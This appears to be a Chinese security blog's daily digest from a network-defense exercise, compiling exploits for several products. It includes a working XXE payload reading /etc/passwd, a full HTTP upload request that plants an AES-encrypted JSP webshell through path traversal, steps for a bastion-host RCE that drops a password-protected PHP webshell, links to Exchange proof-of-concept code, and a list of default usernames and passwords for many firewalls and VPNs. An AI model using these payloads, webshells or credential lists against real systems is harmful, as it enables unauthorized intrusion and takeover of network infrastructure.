0914HW日报☞ 来源:lemon-sec

蹲守机房的第四天，机房依旧很冷，冷的要命，尤其临近饭点还有点饥寒交迫的感觉。但是不敢松懈，要提醒自己时刻保持警惕，随时等候拔线的指令。

今天很安静，但是请别大意

今天 ，你拔线了么？

满当当的昨天，
富意义的今天～

Apache Cocoon XML注入 [CVE-2020-11991]

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName> 
<lastName>&ent;</lastName>
</userInfo>

Horde Groupware Webmail Edition 远程命令执行

泛微云桥任意文件读取升级玩法

某版本安X（某软）任意文件上传漏洞EXP(某软准入)

安X任意文件上传漏洞EXP（某软准入）

POST /uai/download/uploadfileToPath.htm HTTP/1.1HOST: xxxxx... ...
-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"Content-Type: image/png
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="uploadpath"
../webapps/notifymsg/devreport/-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

宝塔面板phpMyadmin未授权访问

来源: https://mp.weixin.qq.com/s/3ZjwFo5gWlJACSkeYWQLXA

前段时间在朋友圈和微信群里火热不行的宝塔数据库面板未授权无需登录,以下是存在安全问题的版本。

- Linux正式版7.4.2

- Linux测试版7.5.13

- Windows正式版6.8

1、宝塔默认phpMyadmin端口就是888 而这个漏洞排查方式极其简单 172.10.0.121:888/pma

2、如果宝塔是存在安全问题的版本,那就会直接出现phpMyadmin面板页面。

以下转载：乌云安全

齐治堡垒机前台远程命令执行漏洞

来源：乌云安全

漏洞利用：

利用条件：无需登录：

第一http://10.20.10.11/listener/cluster_manage.php 返回“OK”。
第二，执行以下链接即可 getshell，执行成功后，生成 PHP 一句话马/var/www/shterm/resources/qrcode/lbj77.php 密码 10086，使用 BASE64 进行编码。这里假设 10.20.10.10 为堡垒机的 IP 地址。

特征：
漏洞利用点：

Exchange Server 远程代码执行漏洞

ps版POC：https://srcincite.io/pocs/cve-2020-16875.ps1.txt

py版POC：https://srcincite.io/pocs/cve-2020-16875.py.txt

安全设备弱密码排查列表

来源: 热心网友提供

其实这些设备本身是没有弱密码的,用户安全意识不足使用了不安全的密码。

天融信防火墙 用户名:superman 密码:talent

天融信防火墙 用户名:superman 密码:talent!23 

联想网御防火墙 用户名:admin 密码:leadsec@7766、administrator、bane@7766

深信服防火墙 用户名：admin 密码：admin

启明星辰 用户名：admin 密码：bane@7766 用户名：admin 密码：admin@123

juniper 用户名:netscreen 密码:netscreen

Cisco 用户名:admin 密码:cisco

Huawei 用户名:admin 密码:Admin@123 

H3C 用户名:admin 密码:admin

绿盟IPS 用户名: weboper 密码: weboper

网神防火墙GE1 用户名：admin 密码：firewall

深信服VPN：51111端口   密码:delanrecover

华为VPN：账号：root  密码：mduadmin

华为防火墙：admin   密码:Admin@123    

EudemonJuniper防火墙：netscreen    netscreen

迪普 192.168.0.1 默认的用户名和密码（admin/admin_default)

山石 192.168.1.1 默认的管理账号为hillstone，密码为hillstone

安恒的明御防火墙 admin/adminadmin

某堡垒机 shterm/shterm

天融信的vpn test/123456

走过路过的大佬们留个关注再走呗